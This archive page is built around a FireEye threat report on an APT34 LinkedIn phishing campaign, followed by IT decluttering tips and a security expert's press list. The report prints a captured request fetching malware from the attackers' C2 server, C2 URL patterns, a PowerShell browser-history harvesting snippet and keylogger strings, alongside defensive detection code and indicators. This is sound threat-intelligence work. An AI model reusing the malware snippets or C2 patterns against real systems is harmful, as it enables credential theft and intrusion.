Monthly Archives: July 2019
PayPal Reports Second Quarter 2019 Results
Hard Pass: Declining APT34’s Invite to Join Their Professional Network
Background
With increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and scope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this gap by conducting espionage against decision makers and key organizations that may have information that furthers Iran's economic and national security goals. The identification of new malware and the creation of additional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of Iranian interests.
FireEye Identifies Phishing Campaign
In late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor. Three key attributes caught our eye with this particular campaign:
- Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,
- The usage of LinkedIn to deliver malicious documents,
- The addition of three new malware families to APT34’s arsenal.
FireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its tracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE), Intelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of PICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will examine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying their hand at Golang.
APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix of public and non-public tools to collect strategic information that would benefit nation-state interests pertaining to geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by various security researchers. This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial, energy, and government entities.
Additional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.
Mandiant Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight: Iran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection efforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include APT33, which is mentioned in this updated FireEye blog post.
Industries Targeted
The activities observed by Managed Defense, and described in this post, were primarily targeting the following industries:
- Energy and Utilities
- Government
- Oil and Gas
Utilizing Cambridge University to Establish Trust
On June 19, 2019, Mandiant Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.
The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.
A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.
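The observation that System.doc is a PE despite its "doc" extension can be turned into a content-versus-extension check. The following is an added example, not FireEye's code: the helper names, the extension list and the constructed sample bytes are assumptions made for illustration.

```python
import os
import struct

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                        # .docx/.xlsx container
# Assumption: extensions treated as "documents" for this check.
DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".rtf", ".pdf"}


def is_pe(data: bytes) -> bool:
    """True when data starts with MZ and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Reject offsets that fall outside the bytes we actually hold.
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff(data: bytes) -> str:
    """Classify a file header by content, ignoring its name."""
    if is_pe(data):
        return "pe"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def masquerading(name: str, data: bytes) -> bool:
    """True when the name claims a document type but the content is a PE."""
    ext = os.path.splitext(name)[1].lower()
    return ext in DOC_EXTS and sniff(data) == "pe"


def scan_tree(root: str, head: int = 4096) -> list:
    """Walk root, read the first `head` bytes of each file, return mismatched paths."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(head)
            except OSError:
                continue  # unreadable or locked file: skip rather than abort the sweep
            if masquerading(name, data):
                hits.append(path)
    return sorted(hits)


def make_fake_pe() -> bytes:
    """Constructed sample: the smallest header that satisfies is_pe(), not a real binary."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"PE\x00\x00" + bytes(20)


if __name__ == "__main__":
    print(masquerading("System.doc", make_fake_pe()))          # PE bytes, document name
    print(masquerading("report.doc", OLE2_MAGIC + bytes(504)))  # genuine OLE2 header
```

Only the first 4 KiB of each file is read, so a PE whose header offset lies beyond that window is not flagged; raise `head` if that matters in your environment.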
Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.
Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.
Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF
This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.
FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:
- 96feed478c347d4b95a8224de26a1b2c
- caf418cbf6a9c4e93e79d4714d5d3b87
A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.
Figure 2: Screenshot of VBA code from System.doc
The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.
Figure 3: Additional VBA code from System.doc
Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.
The FireEye Footprint: Pivots and Victim Identification
After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.
Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:
- hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
- hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
- hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
- hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000
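The URL structures listed above can be matched in proxy logs by shape as well as by domain, so that a change of C2 host still leaves a lead. The following is an added example, not FireEye's detection logic: the five-field log format, the sample lines, the `example.test` hosts and the assumption that a sys_id is any three non-delimiter characters are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Domain from the post, stored defanged and refanged only for matching.
C2_HOSTS = {"offlineearthquake[.]com".replace("[.]", ".")}

# Assumption: a sys_id is any three characters that are not URL delimiters.
THREE = re.compile(r"[^/?&#\s]{3}")
FILE_PATH = re.compile(r"/file/(?P<sys_id>[^/]+)/(?P<exe>[^/]+)")


def classify(url):
    """Return a dict describing a URL that fits one of the listed structures, else None."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    ids = q.get("id", [])
    if len(ids) != 1:
        return None
    n_ok = q.get("n") == ["000"]
    h_ok = q.get("h") == ["000"]
    hit = None
    if parts.path in ("/download", "/upload") and n_ok and THREE.fullmatch(ids[0]):
        # /download and /upload carry the sys_id in the id parameter.
        hit = {"kind": parts.path[1:], "sys_id": ids[0], "exe": None}
    else:
        # /file/<sys_id>/<executable> carries the sys_id in the path.
        m = FILE_PATH.fullmatch(parts.path)
        if m and (n_ok or h_ok) and THREE.fullmatch(m["sys_id"]):
            hit = {"kind": "file", "sys_id": m["sys_id"], "exe": m["exe"]}
    if hit:
        host = (parts.hostname or "").lower()
        hit["host"] = host
        # A shape-only match on an unknown host is a lead to triage, not a verdict.
        hit["confidence"] = "high" if host in C2_HOSTS else "structure-only"
    return hit


def scan(lines):
    """Parse 'timestamp client method url status' lines and return the matching requests."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed or truncated entry
        ts, client, method, url, _status = fields
        hit = classify(url)
        if hit:
            hit.update(ts=ts, client=client, method=method)
            hits.append(hit)
    return hits


def sys_ids_by_client(hits):
    """Group observed sys_id values by internal client address for scoping."""
    out = defaultdict(set)
    for h in hits:
        out[h["client"]].add(h["sys_id"])
    return dict(out)


_C2 = next(iter(C2_HOSTS))
# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    f"2019-06-19T10:01:02Z 10.0.0.15 GET http://{_C2}/download?id=a1b&n=000 200",
    f"2019-06-19T10:02:02Z 10.0.0.15 POST http://{_C2}/upload?id=a1b&n=000 200",
    f"2019-06-19T10:03:02Z 10.0.0.15 GET http://{_C2}/file/a1b/b.exe?id=x9z&n=000 200",
    "2019-06-19T10:04:10Z 10.0.0.22 GET http://files.example.test/file/q7k/tool.exe?id=001&h=000 200",
    "2019-06-19T10:05:00Z 10.0.0.30 GET http://intranet.example.test/download?id=12345&n=000 200",
    "2019-06-19T10:06:00Z 10.0.0.30 GET http://cdn.example.test/file/abc/readme.txt 200",
    "truncated line",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["ts"], h["client"], h["kind"], h["sys_id"], h["host"], h["confidence"])
```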
The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.
FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).
    GET hxxp://offlineearthquake.com/file/<sys_id>/b.exe?id=<3char_redacted>&n=000
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) AppleWebKit/537.36 (KHTML, like Gecko)
    Host: offlineearthquake[.]com
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    HTTP/1.1
Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance
FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.
VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.
VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.
Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.
PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.
Conclusion
The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.
We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.
Learn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.
Malware Appendix
TONEDEAF
TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.
Figure 5: Snippet of code from TONEDEAF binary
Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.
VALUEVAULT
VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.
VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.
    powershell.exe /c "function get-iehistory {
        [CmdletBinding()]
        param ()

        $shell = New-Object -ComObject Shell.Application
        $hist = $shell.NameSpace(34)
        $folder = $hist.Self

        $hist.Items() |
        foreach {
            if ($_.IsFolder) {
                $siteFolder = $_.GetFolder
                $siteFolder.Items() |
                foreach {
                    $site = $_

                    if ($site.IsFolder) {
                        $pageFolder = $site.GetFolder
                        $pageFolder.Items() |
                        foreach {
                            $visit = New-Object -TypeName PSObject -Property @{
                                URL = $($pageFolder.GetDetailsOf($_,0))
                            }
                            $visit
                        }
                    }
                }
            }
        }
    }
    get-iehistory
Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials
Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.
Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database
VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.
    C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
Figure 8: Golang files extracted during execution of VALUEVAULT
LONGWATCH
FireEye identified the binary WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.
Interesting strings identified in the binary are shown in Figure 9.
    GetAsyncKeyState
    >---------------------------------------------------\n\n
    c:\\windows\\temp\\log.txt
    [ENTER]
    [CapsLock]
    [CRTL]
    [PAGE_UP]
    [PAGE_DOWN]
    [HOME]
    [LEFT]
    [RIGHT]
    [DOWN]
    [PRINT]
    [PRINT SCREEN] (1 space)
    [INSERT]
    [SLEEP]
    [PAUSE]
    \n---------------CLIPBOARD------------\n
    \n\n >>> (2 spaces)
    c:\\windows\\temp\\log.txt
Figure 9: Strings identified in a LONGWATCH binary
Detecting the Techniques
FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 1 contains several specific detection names that provide an indication of APT34 activity.
| Signature Name |
| --- |
| FE_APT_Keylogger_Win_LONGWATCH_1 |
| FE_APT_Keylogger_Win_LONGWATCH_2 |
| FE_APT_Keylogger_Win32_LONGWATCH_1 |
| FE_APT_HackTool_Win_PICKPOCKET_1 |
| FE_APT_Trojan_Win32_VALUEVAULT_1 |
| FE_APT_Backdoor_Win32_TONEDEAF |
| TONEDEAF BACKDOOR [DNS] |
| TONEDEAF BACKDOOR [upload] |
| TONEDEAF BACKDOOR [URI] |
Table 1: FireEye Platform Detections
Endpoint Indicators
| Indicator | MD5 Hash (if applicable) | Code Family |
| --- | --- | --- |
| System.doc | b338baa673ac007d7af54075ea69660b | TONEDEAF |
| | 50fb09d53c856dcd0782e1470eaeae35 | TONEDEAF |
| ERFT-Details.xls | 96feed478c347d4b95a8224de26a1b2c | TONEDEAF DROPPER |
| | caf418cbf6a9c4e93e79d4714d5d3b87 | TONEDEAF DROPPER |
| b.exe | 9fff498b78d9498b33e08b892148135f | VALUEVAULT |
| WindowsNTProgram.exe | 021a0f57fe09116a43c27e5133a57a0a | LONGWATCH |
| PE86.dll | d8abe843db508048b4d4db748f92a103 | PICKPOCKET |
| PE64.dll | 6eca9c2b7cf12c247032aae28419319e | PICKPOCKET |
Table 2: APT34 Endpoint Indicators from this blog post
Network Indicators
hxxp[://]www[.]cam-research-ac[.]com
offlineearthquake[.]com
c[.]cdn-edge-akamai[.]com
185[.]15[.]247[.]154
Acknowledgements
A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.
Tips for the IT Department on Reducing Cyber Clutter
Just like kitchen drawers and closets, computers accumulate clutter over time. And when you have an entire organization’s worth of people to watch and exponential amounts of data collected every day, it takes more than a day of spring cleaning to get your environment clean. Clearing out your team’s cyber clutter will not only help make the business more organized and productive, but it will also mitigate the vulnerabilities that accompany the clutter.
Here are four areas you should de-clutter to ensure your organization’s digital presence is clean:
1. Physical Devices
Physical devices can take up most of your organizational environment, from user computers to firewalls. All of these devices have proprietary information of some form on them, so it’s wise to keep them at the forefront of your decluttering.
Here are a few tips:
- Create and enforce policies and procedures for your organization’s documents.
- Implement a document deletion policy and make sure your team is aware of it. You don’t want a user’s computer to be stolen with years’ worth of documents stored on it.
- Consider how sensitive documents are handled. These are documents that should not be accessed by the general organization, should not be stored on a local machine, and may need to be encrypted.
- If you have a cloud storage solution, enforce automatic backup for users. This enables you to have a better view of what your users are storing and what they are doing with those documents.
2. Cloud Storage
Because cloud storage doesn’t take up space in your server room, it’s easy to forget to quality control it as you do your physical storage. And while cloud storage is generally hosted by trusted service providers, we’ve seen these servers open in the wild before.
When cloud storage applications are one of the easiest ways to exfiltrate company data, it’s important to regularly clean them out and restrict access as appropriate.
- Are you currently restricting what cloud storage systems your users are able to access? This is a twofold concern as having company accounts attached to multiple cloud systems opens up avenues for attackers and data exfiltration.
- Enforce your company document policies and procedures with your cloud storage. It’s actually easier to enforce some policies within the cloud, such as least privilege permissions.
- Utilize the built-in security features that many cloud storage apps have. These can protect against data exfiltration or alert for suspicious activity.
3. Email
Email accounts are some of the largest data hubs, storing information about an account’s owner and everyone they interact with. Think of the email accounts of the members of your HR department, full of employees’ sensitive data.
When addressing the security of your company’s email accounts, consider:
- Do you have a limit on how much data a single inbox can hold?
- If you don’t have a limit, do you have a widely known policy on the importance of cleaning out your email boxes every so often? This depends on your organization, but your users should be informed of the risks of keeping their friend’s vendor’s personal contact information in their inbox for six months.
- Sometimes it’s surprising what capabilities users are unaware of within their emails. It’s a great idea to empower your users to utilize your email service’s tools by providing them with guides for things like how to:
  - Search for sensitive data to quickly find and delete it,
  - Set up automatic deletion rules, and
  - Set up rules that screen their inbox for marketing or important emails.
- If your organization has a data retention policy, make sure that emails are included in it. This will affect the permissions your users have; for example, you can completely remove users’ ability to delete emails within their individual inboxes.
4. Apps
Oftentimes we forget the pervasiveness of apps, whether they’re on our computer or mobile devices. Most companies are utilizing Mobile Device Management (MDM) for their devices.
However, an MDM still needs to be reviewed and have proper enforcements put in place. Consider:
- Are apps restricted only to the people that need them? For example, your marketing team may need access to Facebook and Instagram, but your engineers do not.
- If there are accounts or subscriptions associated with an app, be sure to document all of the relevant information. You don’t want to run into a situation where an employee leaves the organization, but they were the sole owner of applications important to the organizational workflow.
- All apps should be as securely configured as possible; however, sometimes apps make this difficult by hiding the settings in question. Review all apps and create procedures for secure configuration before they are allowed to the general population of your organization.
Other Things to Think about
- For organizations that utilize photography or videography, keep in mind that this type of data is just as vulnerable as a text document. Your organizational data policies apply here, perhaps even more stringently.
- Password keepers are a great method of ensuring that users adhere to proper password practice, such as using strong and unique passwords. Make sure the user is aware of how to properly use the password keeper, otherwise they may find ways to avoid using it.
- Implement a company-wide multi-factor authentication policy to prevent unauthorized access to your systems. It’s also important to judge your needs of security and your users’ acceptance to see if you should invest in hard tokens instead of the more common soft tokens like authentication apps.
By following the tips above to de-clutter your IT environment, you will ultimately help your organization become more secure.
The post Tips for the IT Department on Reducing Cyber Clutter appeared first on GRA Quantum.
Happy Birthday TaoSecurity.com
Reference: TaoSecurity Press
- As of 2017, Mr. Bejtlich generally declines press inquiries on cybersecurity matters, including those on background.
- 2016
- Mr. Bejtlich was cited in the Fortune story Meet the US's First Ever Cyber Chief, published 8 September 2016.
- Mr. Bejtlich was interviewed for the NPR story Cybersecurity: Who's Vulnerable To Attack?, aired 30 July 2016.
- Mr. Bejtlich was interviewed for the Washington Post story It’s not just the DNC; we all send emails we probably shouldn’t, published 25 July 2016.
- Mr. Bejtlich was interviewed for the New Scientist story NATO says the internet is now a war zone – what does that mean?, published 22 June 2016.
- Mr. Bejtlich was interviewed for the Military Times story The Pentagon's controversial plan to hire military leaders off the street, published 19 June 2016.
- Mr. Bejtlich was interviewed for the Idealog story Idealog talks with a cyber-war expert, published 6 May 2016.
- Mr. Bejtlich was cited in the New Zealand Herald story Cyber-attacks part of doing business with China - experts, published 5 May 2016.
- Mr. Bejtlich was cited in the Christian Science Monitor story Iran hacking indictment highlights US naming and shaming strategy, published 30 March 2016.
- Mr. Bejtlich was cited in the Financial Times story Defence groups take aim at cyber security, published 28 March 2016.
- Mr. Bejtlich was interviewed for the Security Management story A Chinese New Year, published 4 January 2016.
- 2015
- Mr. Bejtlich was cited in the AP story US Advised to Examine "Hack Back" Options against China, published 17 November 2015.
- Mr. Bejtlich was cited in the Reuters story Data from US agency cyber breach not on black market - researcher, published 2 November 2015.
- Mr. Bejtlich was cited in the NextGov story Creative, Audacious or Destructive: The Different Personalities of Nation-State Hackers, published 2 November 2015.
- Mr. Bejtlich was cited in the Baltimore Sun story As more devices go online, hackers hunt for vulnerabilities, published 24 October 2015.
- Mr. Bejtlich was cited in the Atlantic story Can Campus Networks Ever Be Secure?, published 12 October 2015.
- Mr. Bejtlich was cited in the Info Security story China Cuffs Hackers at Request of US Officials, published 12 October 2015.
- Mr. Bejtlich was interviewed for the Risky Business podcast, aired 2 October 2015.
- Mr. Bejtlich was cited in the NextGov story Who’s Really in Charge of Federal Cybersecurity and Is It Time for a White House CISO?, published 30 September 2015.
- Mr. Bejtlich was cited in the FCW story Time for U.S. to gut 'malware kingpins', published 29 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story Xi and Obama agree on cybercrime cooperation meetings as threat of sanctions of alleged theft of trade secrets looms, published 27 September 2015.
- Mr. Bejtlich was cited in the MIT Technology Review story Waiting for a Drop in Corporate Hacks after U.S.-China Deal, published 25 September 2015.
- Mr. Bejtlich was cited in the Foreign Policy story Will China Deliver on Its Promise to Stop Hacking American Businesses?, published 25 September 2015.
- Mr. Bejtlich was cited in the InfoWorld story U.S., China reach 'common understanding' on cyber attacks, published 25 September 2015.
- Mr. Bejtlich was cited in the Buzzfeed story The U.S. And China Are Discussing A Cyber Arms Pact, But Everyone Is Still Getting Hacked, published 23 September 2015.
- Mr. Bejtlich was cited in the CNBC story China's Xi to visit US tech—amid tepid expectations, published 23 September 2015.
- Mr. Bejtlich was cited in the USA Today story China: On cybersecurity, U.S. must not rock the boat, published 23 September 2015.
- Mr. Bejtlich was cited in the Gigaom story Considering the security implications of CloudFlare’s partnership with Baidu, published 21 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story Companies must be willing to go to war against hackers to protect sensitive data, or stop collecting it: experts, published 17 September 2015.
- Mr. Bejtlich was cited in the TechRepublic story The new art of war: How trolls, hackers and spies are rewriting the rules of conflict, published 14 September 2015.
- Mr. Bejtlich was cited in the GBTimes story Cyber security: A thorn in US-China relations, published 4 September 2015.
- Mr. Bejtlich was cited in the CNBC story http://www.cnbc.com/2015/09/02/the-new-global-cyberwar-without-boundaries-or-winners.html, published 2 September 2015.
- Mr. Bejtlich was cited in the South China Morning Post story The US may have to go after the 'Great Firewall' to stop China's cyber-attacks, published 30 August 2015.
- Mr. Bejtlich was interviewed for the Dark Reading broadcast Richard Bejtlich Talks Business Security Strategy, US Security Policy, published 26 August 2015.
- Mr. Bejtlich was cited in the CBS News story Does Ashley Madison represent a new era in hacking?, published 19 August 2015.
- Mr. Bejtlich was cited in the New Economy story Firms’ lack of knowledge puts them dangerously at risk of cyber attacks, published 17 August 2015.
- Mr. Bejtlich was cited in the Washington Post story Just how secure are private e-mail servers? Hint: not very, published 13 August 2015.
- Mr. Bejtlich was cited in the USNI story Sen. Gardner: Administration Unwilling to ‘Name Names’ in Cyber Security Breaches, published 23 July 2015.
- Mr. Bejtlich was cited in the NextGov story OPM Chief’s New Cyber Defense Operation Has Potential, Private Investigators Say, published 28 June 2015.
- Mr. Bejtlich was cited in the DefenseNews story OPM Attack Raises Delicate Political Questions, published 27 June 2015.
- Mr. Bejtlich was interviewed on CNBC Asia (video), aired live 25 June 2015.
- Mr. Bejtlich was interviewed for the Risky Business podcast, aired 25 June 2015.
- Mr. Bejtlich was cited in the Federal Times story OPM breach a failure on encryption, detection, published 22 June 2015.
- Mr. Bejtlich was cited in the Dark Reading story OPM Breach Exposes Agency's Systemic Security Woes, published 10 June 2015.
- Mr. Bejtlich was interviewed on the Kojo Nnamdi Show segment The Implications of a New Federal Government Data Breach, aired live 8 June 2015.
- Mr. Bejtlich was cited in the Washington Post story Is e-mail the safest way to notify federal workers their data may have been hacked?, published 8 June 2015.
- Mr. Bejtlich appeared on a panel on the TV program Defense News, in two segments, aired 7 June 2015.
- Mr. Bejtlich was cited in the Washington Post story Why OPM should have seen the latest cyberattack coming, published 5 June 2015.
- Mr. Bejtlich was cited in the Daily Beast story New Snowden Docs Show How the NSA and FBI Became BFFs, published 4 June 2015.
- Mr. Bejtlich was cited in the Newsweek story Vladimir Putin’s Budding Bromance With China’s Xi Jinping, published 16 May 2015.
- Mr. Bejtlich was cited in the Dark Reading story What Does China-Russia 'No Hack' Pact Mean For US?, published 11 May 2015.
- Mr. Bejtlich was cited in the Tech Republic story Latest President Obama-requested cyberthreat intelligence agency may be overkill, published 1 May 2015.
- Mr. Bejtlich was cited in the Financial Times story Pentagon makes pitch to young tech-savvy individuals, published 23 April 2015.
- Mr. Bejtlich was cited in the Wall Street Journal story Five Simple Steps to Protect Corporate Data, published 19 April 2015.
- Mr. Bejtlich was cited in the China Digital Times story http://chinadigitaltimes.net/2015/04/chinese-great-cannon-identified-behind-greatfire-attacks/, published 10 April 2015.
- Mr. Bejtlich was cited in the Military Times story Does cyber corps merit its own service branch?, published 9 April 2015.
- Mr. Bejtlich was cited in the Fortune story Gasp! China admits to having cyber warriors, published 26 March 2015.
- Mr. Bejtlich was cited in The Hill story House Intel panel closing in on cyber bill, published 19 March 2015.
- Mr. Bejtlich was cited in The Hill story DOJ: 'We have no interest in prosecuting' cyber researchers, published 19 March 2015.
- Mr. Bejtlich was cited in the Washington Post story Federal government struggles to manage communication devices, published 17 March 2015.
- Mr. Bejtlich was cited in the Baltimore Sun story Defense secretary: We could create separate military force to fight cyber wars, published 13 March 2015.
- Mr. Bejtlich was cited in the Bloomberg story A BlackBerry Here, iPhone There: Clinton Reveals E-Mail Anarchy, published 12 March 2015.
- Mr. Bejtlich was cited in the Bloomberg story Most Big Firms Have Had Some Hacking: Business of Law, published 11 March 2015.
- Mr. Bejtlich was cited in the Dark Reading story Efforts To Team Up And Fight Off Hackers Intensify, published 5 March 2015.
- Mr. Bejtlich's testimony to the House Energy and Commerce committee was covered in the FierceGovernmentIT story CISOs must first define the risk, cybersecurity analyst tells Congress, published 5 March 2015, the Hill story Expert: Healthcare lacks 'top-tier' cyber defenses, published 3 March 2015, and the Pittsburgh Tribune-Review story Cyber security expert to report to Congress, published 3 March 2015.
- Mr. Bejtlich's panel at the Washington Business Journal cyber security conference was covered in the stories Want to be acquired? Get your cybersecurity in order and Does your company need cyber insurance?, published on 27 February and 2 March 2015, respectively.
- Mr. Bejtlich was interviewed for the SiriusXM POTUS channel, discussing CTIIC (audio download), aired on 27 February 2015.
- Mr. Bejtlich's panel at the Wall Street Journal CIO conference was covered in the stories Sony Attack Took Company ‘Back to the ‘80s’, Data Breaches Spark Debates on CISO, CIO Dynamic, and How the Sony Breach Changes Cybersecurity, published in early February 2015.
- Mr. Bejtlich was mentioned in the Intercept article Western Spy Agencies Secretly Rely on Hackers for Intel and Expertise, published 4 February 2015.
